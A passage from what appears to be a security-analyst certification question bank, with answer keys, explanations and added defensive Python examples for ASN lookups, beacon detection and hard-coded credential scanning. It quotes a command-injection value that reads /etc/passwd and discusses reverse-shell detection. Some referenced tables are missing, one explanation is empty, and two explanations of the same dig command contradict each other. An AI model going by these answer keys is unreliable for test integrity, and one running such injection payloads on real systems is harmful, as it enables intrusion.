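The benign second line matters as much as the hits: /dev/tcp is routinely used in scripts to test whether a port is open, so a detection that fires on the path alone will drown the SOC in false positives. Requiring an interactive shell or a stdin redirection from the socket is what separates a port check from a reverse shell.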
Question: 42
A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?
A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning
Answer: C
Explanation: Agent-based scanning installs a software agent on each target system; the agent inspects the host locally with the privileges it already holds and reports results to a central console. The security team therefore does not need to be issued network-level credentials (domain or root accounts) for the systems, which is the access the company is worried about granting, while the agent still sees installed packages, patch levels, and configuration as accurately as a credentialed scan would. Passive scanning (B) also needs no access, but it only infers versions from observed traffic and is far less accurate. Credentialed network scanning (A) is accurate precisely because the scanning team is handed the credentials the question wants to avoid, and dynamic scanning (D) tests running applications rather than host vulnerabilities.

Question: 43
A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?
A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
B. function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info" }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }
D. function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
Answer: C
Explanation: The function that identifies routing anomalies most accurately is option C:
function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }
This function takes an IP address as an argument and performs two DNS lookups using the dig command.
The first lookup, dig -x $1, is a reverse lookup whose output names the address in in-addr.arpa form (for 10.1.1.1, 1.1.1.10.in-addr.arpa); the grep, tail, and awk steps do not use the hostname it returns but cut the line at .in-addr, leaving the octets in reversed order. The second lookup appends .origin.asn.cymru.com to that reversed form and asks for its TXT record, which Team Cymru's IP-to-ASN service answers with the autonomous system number, the announced prefix, the country code, the registry, and the allocation date. The function then prints the IP address alongside that ASN information. Routing anomalies such as a prefix hijack or a route leak show up as an address being originated by an unexpected AS, which is why the ASN view is the most accurate of the four; geolocation (A), ping round-trip time (B), and the last traceroute hop (D) do not reveal which network originates the route.

Question: 44
There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?
A. Implement step-up authentication for administrators
B. Improve employee training and awareness
C. Increase password complexity standards
D. Deploy mobile device management
Answer: B
Explanation: The best security control against sensitive information being disclosed via file sharing services is to improve employee training and awareness. Training educates employees on the risks and consequences of using file sharing services for sensitive information and on the policies and procedures for handling such information securely, and it helps foster a security culture in which employees report incidents or violations. Stronger administrator authentication, password complexity, and mobile device management address other risks and would not stop an authorized employee from uploading a document to a sharing service.

Question: 45
Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?
A. Determine the sophistication of the audience that the report is meant for
B. Include references and sources of information on the first page
C. Include a table of contents outlining the entire report
D.
Decide on the color scheme that will effectively communicate the metrics
Answer: A
Explanation: The best way to begin preparing a "What We Learned" report about a recent breach is to determine the sophistication of the audience the report is meant for, meaning their level of technical knowledge, understanding, and interest in cybersecurity topics. Knowing the audience drives the content, language, tone, and format of the report: a report for executive management will be more concise, high-level, and business-oriented than one written for technical staff or peers. References, a table of contents, and a color scheme are decided later and depend on that choice.

Question: 46
A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?
A. Upload the binary to an air gapped sandbox for analysis
B. Send the binaries to the antivirus vendor
C. Execute the binaries on an environment with internet connectivity
D. Query the file hashes using VirusTotal
Answer: A
Explanation: The action that allows the analyst to gather intelligence without disclosing information to the attackers is to analyze the binaries in an air gapped sandbox, an isolated environment with no connection to any external network or system. Running the samples there prevents any communication between the binary and the attackers' infrastructure, which would otherwise reveal that the malware has been discovered and is being studied, and it also prevents the malware from infecting other systems. The analyst can safely observe the behavior, functionality, and characteristics of the binaries, including any network destinations they attempt to reach. Detonating the samples with internet connectivity (C) does exactly what the attackers would watch for, and sharing targeted samples with a vendor or a public multi-scanner (B, D) places them where third parties, potentially including the attackers, can learn that they have been identified.
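The dig one-liner in Question 43 above (repeated in Question 64, alongside the geoiplookup function in Question 65) derives the Team Cymru query name through a reverse lookup. As an added example that is not part of the exam material, the code below computes that name directly, parses the TXT answer format the service returns, and groups addresses by origin AS and country, which is the routing view those questions are after. It makes no DNS queries: the TXT answers are constructed from documentation address ranges and private ASNs using the "ASN | prefix | country | registry | allocation date" field order that origin.asn.cymru.com returns.

```python
"""Added example for Questions 43, 64 and 65 (not part of the original question bank):
build the origin.asn.cymru.com query name without a reverse lookup, parse the TXT
answer, and group addresses by origin AS and country. Answers below are constructed."""
import ipaddress
from typing import Dict, List, Tuple


def origin_query_name(ip: str) -> str:
    """Return <reversed octets>.origin.asn.cymru.com for an IPv4 address.
    This is what `dig -x` followed by `awk -F .in-addr` yields in the shell
    function; computing it directly also works for addresses with no PTR record."""
    addr = ipaddress.IPv4Address(ip)            # raises ValueError on bad input
    reversed_octets = ".".join(reversed(str(addr).split(".")))
    return f"{reversed_octets}.origin.asn.cymru.com"


def parse_origin_txt(txt: str) -> dict:
    """Parse one origin.asn.cymru.com TXT record such as
    "13335 | 1.1.1.0/24 | US | apnic | 2010-07-14".
    Prefixes announced by several ASes list them space-separated in field one."""
    fields = [f.strip() for f in txt.strip().strip('"').split("|")]
    if len(fields) != 5:
        raise ValueError(f"unexpected origin TXT format: {txt!r}")
    asns, prefix, country, registry, allocated = fields
    return {"asn": [int(a) for a in asns.split()], "prefix": prefix,
            "country": country, "registry": registry, "allocated": allocated}


def group_by_origin(answers: Dict[str, str]) -> Dict[Tuple[int, str], List[str]]:
    """answers maps IP -> TXT answer. Returns {(first ASN, country): [ips]} so that
    addresses from different source networks sharing an origin AS stand out; an
    address whose origin AS is not the expected one is the routing anomaly."""
    groups: Dict[Tuple[int, str], List[str]] = {}
    for ip, txt in answers.items():
        rec = parse_origin_txt(txt)
        groups.setdefault((rec["asn"][0], rec["country"]), []).append(ip)
    return groups


# Constructed answers (documentation ranges, private ASNs), keyed by the IP queried.
SAMPLE_ANSWERS = {
    "198.51.100.7":   '"64496 | 198.51.100.0/24 | US | arin | 2001-01-01"',
    "198.51.100.200": '"64496 | 198.51.100.0/24 | US | arin | 2001-01-01"',
    "203.0.113.9":    '"64497 | 203.0.113.0/24 | DE | ripencc | 2002-02-02"',
}

if __name__ == "__main__":
    for ip in SAMPLE_ANSWERS:
        print(ip, "->", origin_query_name(ip))
    for (asn, country), ips in group_by_origin(SAMPLE_ANSWERS).items():
        print(f"AS{asn} ({country}): {ips}")
```

In a live script the TXT answer for each name would come from dig +short or a DNS library; the parsing and grouping above are unchanged. Keep the multi-origin case in mind when comparing runs: a prefix that suddenly shows a second origin AS is one of the anomalies the question has in mind.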
Question: 47
Which of the following would help to minimize human engagement and aid in process improvement in security operations?
A. OSSTMM
B. SIEM
C. SOAR
D. OWASP
Answer: C
Explanation: SOAR stands for security orchestration, automation, and response, a class of tools and platforms that streamline, standardize, and automate security operations and incident response processes, typically by running playbooks that enrich alerts, query other tools, and carry out containment steps without an analyst in the loop. SOAR minimizes human engagement and aids process improvement by reducing manual work, human error, response time, and complexity, and by improving collaboration and coordination within security operations and incident response teams. A SIEM collects and correlates events but still relies on analysts to act on them; OSSTMM is a security testing methodology and OWASP an application security community, neither of which is operations tooling.

Question: 48
After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?
A. Avoid
B. Transfer
C. Accept
D. Mitigate
Answer: A
Explanation: Avoidance is the risk management response of not engaging in an activity whose risk is deemed too high or unacceptable. Avoiding a risk eliminates both its possibility and its impact, along with the need for any further risk treatment. Here the CISO judged the risk score too high and refused the software request, so the risk was avoided rather than transferred to a third party, accepted, or mitigated with additional controls.

Question: 49
Which of the following is an important aspect that should be included in the lessons-learned step after an incident?
A. Identify any improvements or changes in the incident response plan or procedures
B. Determine if an internal mistake was made and who did it so they do not repeat the error
C.
Present all legal evidence collected and turn it over to law enforcement
D. Discuss the financial impact of the incident to determine if security controls are well spent
Answer: A
Explanation: An important aspect of the lessons-learned step after an incident is to identify improvements or changes to the incident response plan or procedures. Lessons learned is a review of the incident response activities and outcomes that identifies and documents strengths, weaknesses, gaps, and best practices. Feeding those findings back into the plan improves the organization's security posture, readiness, and capability for future incidents. Assigning blame to individuals (B) discourages honest reporting, and evidence handover and cost analysis (C, D) are separate activities rather than the purpose of the review.

Question: 50
The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?
A. Single pane of glass
B. Single sign-on
C. Data enrichment
D. Deduplication
Answer: D
Explanation: Deduplication removes duplicate or redundant data from a data set or source. When several threat intelligence feeds are consolidated, deduplication eliminates the overlapping indicators of compromise (IoCs), alerts, reports, and recommendations that the feeds repeat, which reduces the volume and complexity of the data and improves its quality, accuracy, and relevance. A single pane of glass only displays the feeds side by side, single sign-on addresses authentication, and enrichment adds context rather than removing redundancy.

Question: 51
Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?
A. MITRE ATT&CK
B. Cyber Kill Chain
C. OWASP
D. STIX/TAXII
Answer: A
Explanation: MITRE ATT&CK is a framework and knowledge base that catalogs the tactics, techniques, and procedures (TTPs) used by adversaries in cyberattacks and maps known threat groups to the techniques they have been observed using.
MITRE ATT&CK lets security analysts compare TTPs between different known adversaries of an organization and identify patterns, gaps, or trends in adversary behavior. It also helps analysts improve threat detection, analysis, and response capabilities and share threat intelligence with other organizations or communities. The Cyber Kill Chain describes the stages of a single intrusion rather than cataloging adversaries, OWASP focuses on application security, and STIX/TAXII are a format and a transport for exchanging intelligence, not a comparison framework.

Question: 52
An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?
A. Eradication
B. Recovery
C. Containment
D. Preparation
Answer: A
Explanation: Eradication is the incident response step in which the root cause and any traces or remnants of the incident are removed from the affected systems or networks: malware, backdoors, compromised accounts, malicious files, and the vulnerability that was exploited. Containment, which precedes it, limits the incident's spread; recovery, which follows, restores systems to normal operation and verifies that the incident cannot recur. The analyst here has already isolated the vulnerability and is actively removing it from the system, which is eradication.

Question: 53
Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?
A. Isolate Joe's PC from the network
B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe's PC using mobile device management
D.
Perform no action until HR or legal counsel advises on next steps
Answer: D
Explanation: The best action for the incident response team to recommend is to take no action until HR or legal counsel advises on next steps. This is a personnel and legal matter rather than a technical compromise: acting unilaterally could violate employee privacy rights, contractual obligations, or organizational policies, and it could expose the organization to legal challenge. Waiting also preserves evidence; reimaging or remotely wiping the PC (B, C) would destroy the very data that HR or legal counsel may need, and isolating it (A) would alert Joe before any decision has been made. Any collection or monitoring that HR or legal counsel does authorize should then be carried out in a way that keeps the evidence admissible.

Question: 54
The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?
A. Reduce the administrator and privileged access accounts
B. Employ a network-based IDS
C. Conduct thorough incident response
D. Enable SSO to enterprise applications
Answer: A
Explanation: The best priority for a program that reduces attack surface as part of a zero trust approach is to reduce the number of administrator and privileged access accounts. These accounts have elevated permissions to perform sensitive or critical tasks on systems or networks, such as installing software, changing configurations, accessing data, or granting access, and common attack frameworks consistently show adversaries seeking them out for privilege escalation and lateral movement. Reducing them limits the number of potential targets and entry points for attackers and reduces the impact of any single account compromise, which is the least-privilege principle at the heart of zero trust. A network IDS and incident response are detective and reactive controls that do not shrink the attack surface, and SSO, while useful, concentrates access rather than reducing privilege.
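Questions 34 and 37 above describe beaconing and the C2 phase, and Question 56 below asks what regular outgoing HTTPS connections from a server that should make none signify. As an added example that is not part of the exam material, the code below scores each source/destination pair in a flow log by the regularity of its inter-arrival times, the simplest beacon heuristic. The flow records are constructed, the timestamp/source/destination:port layout is an assumption, and the 0.2 threshold is a starting point rather than a tuned value.

```python
"""Added example for Questions 34, 37 and 56 (not part of the original question bank):
flag connection pairs whose timing is too regular to be human. Flow records are
constructed; the line layout is assumed, not a real export format."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, List, Optional, Tuple


def parse_flows(lines: List[str]) -> Dict[Tuple[str, str], List[datetime]]:
    """Parse '<ISO timestamp> <src> <dst:port>' lines into per-pair timestamp lists."""
    conns: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        ts, src, dst = line.split()
        conns[(src, dst)].append(datetime.fromisoformat(ts))
    return conns


def beacon_score(times: List[datetime], min_events: int = 6) -> Optional[Tuple[float, float]]:
    """Return (coefficient of variation of the gaps, mean gap in seconds), or None
    when there are too few events to judge. A CV near 0 is metronomic; browsing
    and other human-driven traffic is usually well above 1."""
    if len(times) < min_events:
        return None
    t = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(t, t[1:])]
    mu = mean(gaps)
    if mu == 0:
        return None
    return pstdev(gaps) / mu, mu


def find_beacons(lines: List[str], max_cv: float = 0.2,
                 min_events: int = 6) -> List[Tuple[str, str, int]]:
    """Return (src, dst, mean gap seconds) for pairs whose CV is at or below max_cv.
    Real implants add jitter and sleep through working hours, so treat this as a
    triage score to confirm against host role, destination reputation and volume."""
    hits = []
    for (src, dst), times in parse_flows(lines).items():
        score = beacon_score(times, min_events)
        if score is not None and score[0] <= max_cv:
            hits.append((src, dst, round(score[1])))
    return hits


# Constructed flows: a server calling out every five minutes (give or take a few
# seconds) in the middle of the night, and a workstation browsing irregularly.
SAMPLE_FLOWS = """
2024-03-09T02:00:00 10.0.5.20 203.0.113.77:443
2024-03-09T02:05:02 10.0.5.20 203.0.113.77:443
2024-03-09T02:09:58 10.0.5.20 203.0.113.77:443
2024-03-09T02:15:01 10.0.5.20 203.0.113.77:443
2024-03-09T02:20:00 10.0.5.20 203.0.113.77:443
2024-03-09T02:24:59 10.0.5.20 203.0.113.77:443
2024-03-09T02:30:00 10.0.5.20 203.0.113.77:443
2024-03-09T09:01:10 10.0.7.41 198.51.100.9:443
2024-03-09T09:01:12 10.0.7.41 198.51.100.9:443
2024-03-09T09:14:40 10.0.7.41 198.51.100.9:443
2024-03-09T09:15:05 10.0.7.41 198.51.100.9:443
2024-03-09T11:48:00 10.0.7.41 198.51.100.9:443
2024-03-09T11:48:03 10.0.7.41 198.51.100.9:443
""".splitlines()

if __name__ == "__main__":
    for src, dst, gap in find_beacons(SAMPLE_FLOWS):
        print(f"possible beacon: {src} -> {dst} every ~{gap}s")
```

The server's connections score a CV of about 0.01 and are reported as a beacon at roughly 300 seconds; the workstation's bursty sessions score well above 1 and are ignored. Lowering min_events catches slower beacons at the cost of more noise, and pairing the score with the "should not be making outgoing connections" context from Question 56 is what turns a statistic into an alert worth acting on.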
Question: 55
During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?
A. Clone the virtual server for forensic analysis
B. Log in to the affected server and begin analysis of the logs
C. Restore from the last known-good backup to confirm there was no loss of connectivity
D. Shut down the affected server immediately
Answer: A
Explanation: The first action the analyst should take is to clone the virtual server for forensic analysis. Cloning the virtual server creates an exact copy of its disk and, if the snapshot includes memory, its running state at a specific point in time, which preserves and protects the evidence related to the incident and prevents tampering, contamination, or destruction of that evidence. The analyst can then investigate the copy without affecting the original server or its operations. Logging in to the live server (B) alters logs, timestamps, and memory; restoring from backup (C) overwrites the evidence; and shutting the server down (D) discards volatile data such as running processes and network connections before it has been captured.

Question: 56
A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?
A. C2 beaconing activity
B. Data exfiltration
C. Anomalous activity on unexpected ports
D. Network host IP address scanning
E. A rogue network device
Answer: A
Explanation: The most likely explanation for this traffic pattern is C2 beaconing activity.
C2 stands for command and control, the phase of the Cyber Kill Chain in which the adversary establishes communication with a successfully exploited target. Beaconing is the network signature of that channel: a compromised system sends small, periodic messages to the attacker's infrastructure over protocols such as HTTP(S), DNS, ICMP, or UDP, checking in for new instructions. Regular outbound connections from a server that should not be making any, continuing at the same cadence around the clock, are characteristic of beaconing. Bulk data exfiltration (B) tends to be large and episodic rather than small and periodic, the traffic here uses an expected port (443), and scanning or a rogue device would produce different patterns. Once established, the C2 channel lets the attacker remotely control the target through malware callbacks, backdoors, botnets, or covert channels.

Question: 57
New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?
A. Human resources must email a copy of a user agreement to all new employees
B. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement
C. All new employees must take a test about the company security policy during the onboarding process
D. All new employees must sign a user agreement to acknowledge the company security policy
Answer: D
Explanation: The best action the SOC manager can recommend is to require all new employees to sign a user agreement acknowledging the company security policy. A user agreement defines the rights and responsibilities of users regarding the company's systems, networks, and resources, as well as the consequences of violating the security policy.
Signing it produces a record that the employee has read and agreed to the policy, which is what makes them accountable for any later breaches or incidents caused by their actions or inactions; an emailed copy (A) or a verbal confirmation (B) leaves no such record, and a test (C) measures knowledge rather than acknowledgment.

Question: 58
An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?
A. Information sharing organization
B. Blogs/forums
C. Cybersecurity incident response team
D. Deep/dark web
Answer: A
Explanation: An information sharing organization is a group or network of organizations that share threat intelligence, best practices, and lessons learned related to cybersecurity issues or incidents; sector-specific Information Sharing and Analysis Centers (ISACs) are the usual example. Membership lets the analyst learn about new ransomware campaigns and other emerging threats from organizations in the same industry or region, including the defense supply chain this manufacturer belongs to, and obtain recommendations on preventing, detecting, and responding to them. Blogs, forums, and the dark web are unvetted sources, and the company's own incident response team responds to incidents rather than producing intelligence about campaigns it has not yet seen.

Question: 59
An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?
A. To satisfy regulatory requirements for incident reporting
B. To hold other departments accountable
C. To identify areas of improvement in the incident response process
D.
To highlight the notable practices of the organization's incident response team
Answer: C
Explanation: The most likely reason to include lessons learned in an after-action report is to identify areas of improvement in the incident response process. The lessons learned process reviews and evaluates the incident response activities and outcomes and identifies and documents strengths, weaknesses, gaps, and best practices. Identifying areas of improvement enhances the organization's security posture, readiness, and capability for future incidents and provides feedback or recommendations on how to address the issues or challenges that surfaced; regulatory reporting, accountability, and recognition are not the purpose of the exercise.

Question: 60
A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:
Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?
A. InLoud: Cobain: Yes, Grohl: No, Novo: Yes, Smear: Yes, Channing: No
B. TSpirit: Cobain: Yes, Grohl: Yes, Novo: Yes, Smear: No, Channing: No
C. ENameless: Cobain: Yes, Grohl: No, Novo: Yes, Smear: No, Channing: No
D. PBleach: Cobain: Yes, Grohl: No, Novo: No, Smear: No, Channing: Yes
Answer: B
Explanation: The vulnerability that should be patched first under this scoring system is TSpirit (Cobain: Yes, Grohl: Yes, Novo: Yes, Smear: No, Channing: No). It is the only option that scores Yes on all three of the metrics the team weighs most heavily, Cobain, Grohl, and Novo. The other options score Yes on at most two of those three, and the additional Yes entries for InLoud and PBleach fall on Smear and Channing, which the team has deprioritized.
Therefore, this vulnerability poses a greater risk than the others and should be patched first.

Question: 61
A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
A. Hacktivist
B. Advanced persistent threat
C. Insider threat
D. Script kiddie
Answer: C
Explanation: The user has become an insider threat, specifically an unintentional or negligent one. An insider threat is a person or entity with legitimate access to an organization's systems, networks, or resources whose actions, whether malicious or careless, cause harm to the organization. Insider threats can result from downloading unauthorized software, violating security policies, stealing data, sabotaging systems, or collaborating with external attackers; here the user's legitimate access is what allowed the malware to reach and spread across internal systems. A hacktivist, an advanced persistent threat, and a script kiddie are all external actors.

Question: 62
An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?
A. Take a snapshot of the compromised server and verify its integrity
B. Restore the affected server to remove any malware
C. Contact the appropriate government agency to investigate
D. Research the malware strain to perform attribution
Answer: A
Explanation: With the server contained, the CSIRT's next step is to take a snapshot of it and verify the snapshot's integrity. The snapshot is an exact copy of the server's disk and state at a specific point in time, and verifying its integrity means computing a cryptographic hash of the image and recording it with the chain of custody, so that any later alteration, corruption, or tampering can be detected.
Taking a snapshot and verifying its integrity preserves and protects the evidence related to the incident and prevents tampering, contamination, or destruction of that evidence before analysis begins. Restoring the server (B) would destroy that evidence, and involving a government agency or attributing the malware (C, D) come later, if at all.

Question: 63
During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?
A. Disk contents
B. Backup data
C. Temporary files
D. Running processes
Answer: D
Explanation: Evidence is collected in order of volatility, most volatile first, as laid out in RFC 3227: CPU registers and cache, then memory contents including the process table, routing and ARP tables, and kernel statistics, then temporary file systems, then disk, then remote logs and archival media. Of the options given, running processes are the most volatile: they exist only in memory, change constantly, and vanish when the system is shut down, rebooted, logged off, or crashes, or when another process or user modifies or terminates them. Temporary files come next, disk contents persist across a reboot, and backup data is the least volatile, so running processes must be captured before any other type of evidence listed.

Question: 64
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?
A. function w() { a=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $a" }
B. function x() { b=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short }
D.
function z() { c=$(geoiplookup$1) && echo “$1 | $c” } Answer: C Explanation: The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is: function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short } This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address, such as the country code, registry, or allocation date. The function then prints the IP address and the ASN information, which can help identify any network addresses that belong to the same ASN or region Question: 65 A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective? A. function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” } B. function x() { info=$(geoiplookup $1) && echo “$1 | $info” } C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” } D. function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” } Answer: B Explanation: www.P2PExams.com Questions & Answers PDF P-37 P- The function that would help the analyst identify IP addresses from the same country is: function x() { info=$(geoiplookup $1) && echo “$1 | $info” } This function takes an IP address as an argument and uses the geoiplookup command to get the geographic location information associated with the IP address, such as the country name, country code, region, city, or latitude and longitude. 
The function then prints the IP address and the geographic location information, which can help identify any IP addresses that belong to the same country.

Question: 66
A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:
Which of the following should be completed first to remediate the findings?
A. Ask the web development team to update the page contents
B. Add the IP address allow listing for control panel access
C. Purchase an appropriate certificate from a trusted root CA
D. Perform proper sanitization on all fields
Answer: D
Explanation:
The first action that should be completed to remediate the findings is to perform proper sanitization on all fields. Sanitization is a process that involves validating, filtering, or encoding any user input or data before processing or storing it on a system or application. Sanitization can help prevent various types of attacks, such as cross-site scripting (XSS), SQL injection, or command injection, that exploit unsanitized input or data to execute malicious scripts, commands, or queries on a system or application. Performing proper sanitization on all fields can help address the most critical and common vulnerability found during the vulnerability assessment, which is XSS.

Question: 67
A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:
getconnection (database01, "alpha " , "AXTV. 127GdCx94GTd") ;
Which of the following is the most likely vulnerability in this system?
A. Lack of input validation
B. SQL injection
C. Hard-coded credential
D. Buffer overflow attacks
Answer: C
Explanation:
The most likely vulnerability in this system is hard-coded credential.
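As an added illustration (not code from the original study material), the Python script below shows the pattern behind this question, a string literal passed where the database password belongs, beside a form that reads the secret at run time, and a small AST-based check that flags such calls in source. The getconnection name, its (host, user, password) argument order and the sample source are assumptions modelled on the snippet in the question.

```python
"""Added example, not code from the original study material: the pattern in
question 67 (a string literal passed where the database password belongs)
beside a form that reads the secret at run time, plus a small AST-based check
that flags such calls in source. The getconnection name, its (host, user,
password) argument order and the sample source are assumptions modelled on
the snippet in the question."""
import ast
import os
from typing import Mapping, Optional

# Constructed source text, not real application code. Line 2 is the pattern
# from the question; line 3 reads the secret from the environment instead;
# line 4 passes the literal by keyword, which the check must also catch.
SAMPLE_SOURCE = '''
conn1 = getconnection(database01, "alpha", "AXTV.127GdCx94GTd")
conn2 = getconnection(database01, "alpha", os.environ["DB_PASSWORD"])
conn3 = getconnection(database01, "alpha", password="AXTV.127GdCx94GTd")
'''

# Which positional index or keyword carries the secret for each known API.
# Assumed mapping; a real tool would load this from its configuration.
CREDENTIAL_ARGS = {"getconnection": {"position": 2, "keyword": "password"}}


def _is_string_literal(node: ast.AST) -> bool:
    return isinstance(node, ast.Constant) and isinstance(node.value, str)


def find_hardcoded_credentials(source: str) -> list:
    """Return one finding per call whose credential argument is a literal.
    Only the first four characters of the literal are kept, so the report
    itself does not leak the secret."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)):
            continue
        spec = CREDENTIAL_ARGS.get(node.func.id)
        if spec is None:
            continue
        secret = node.args[spec["position"]] if len(node.args) > spec["position"] else None
        for kw in node.keywords:
            if kw.arg == spec["keyword"]:
                secret = kw.value
        if secret is not None and _is_string_literal(secret):
            findings.append({"line": node.lineno, "call": node.func.id,
                             "redacted": secret.value[:4] + "..."})
    return findings


def getconnection_safe(host: str, user: str,
                       env: Optional[Mapping[str, str]] = None) -> tuple:
    """Hardened form: the secret never appears in source. It is read from the
    environment (or an injected mapping for tests) and absence is an error
    rather than a silent empty password."""
    env = os.environ if env is None else env
    password = env.get("DB_PASSWORD")
    if not password:
        raise RuntimeError("DB_PASSWORD is not set; refusing to connect")
    return (host, user, password)  # hand these to the real connect call


if __name__ == "__main__":
    for f in find_hardcoded_credentials(SAMPLE_SOURCE):
        print(f"line {f['line']}: literal credential passed to {f['call']}() ({f['redacted']})")
```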
Hard-coded credential is a practice of embedding or storing a username, password, or other sensitive information in the source code or configuration file of a system or application. Hard-coded credential can pose a serious security risk, as it can expose the system or application to unauthorized access, data theft, or compromise if the credential is discovered or leaked by an attacker. Hard-coded credential can also make it difficult to change or update the credential if needed, as it may require modifying the code or file and redeploying the system or application.

Question: 68
A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?
A. Leave the proxy as is.
B. Decommission the proxy.
C. Migrate the proxy to the cloud.
D. Patch the proxy.
Answer: B
Explanation:
The best practice that the company should follow with this proxy is to decommission the proxy. Decommissioning the proxy involves removing or disposing of the proxy from the rack and the network, as well as deleting or wiping any data or configuration on the proxy. Decommissioning the proxy can help eliminate the vulnerability on the proxy, as well as reduce the attack surface, complexity, or cost of maintaining the network. Decommissioning the proxy can also free up space or resources for other devices or systems that are in use or needed by the company.

Question: 69
A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:
Which of the following log entries provides evidence of the attempted exploit?
A. Log entry 1
B. Log entry 2
C. Log entry 3
D. Log entry 4
Answer: D
Explanation:
Log entry 4 shows an attempt to exploit the zero-day command injection vulnerability by appending a malicious command (;cat /etc/passwd) to the end of a legitimate request (/cgi-bin/index.cgi?name=John). This command would try to read the contents of the /etc/passwd file, which contains user account information, and could lead to further compromise of the system. The other log entries do not show any signs of command injection, as they do not contain any special characters or commands that could alter the intended behavior of the application.
Official Reference:
https://www.imperva.com/learn/application-security/command-injection/
https://www.zerodayinitiative.com/advisories/published/

Question: 70
Which of the following is the most important factor to ensure accurate incident response reporting?
A. A well-defined timeline of the events
B. A guideline for regulatory reporting
C. Logs from the impacted system
D. A well-developed executive summary
Answer: A
Explanation:
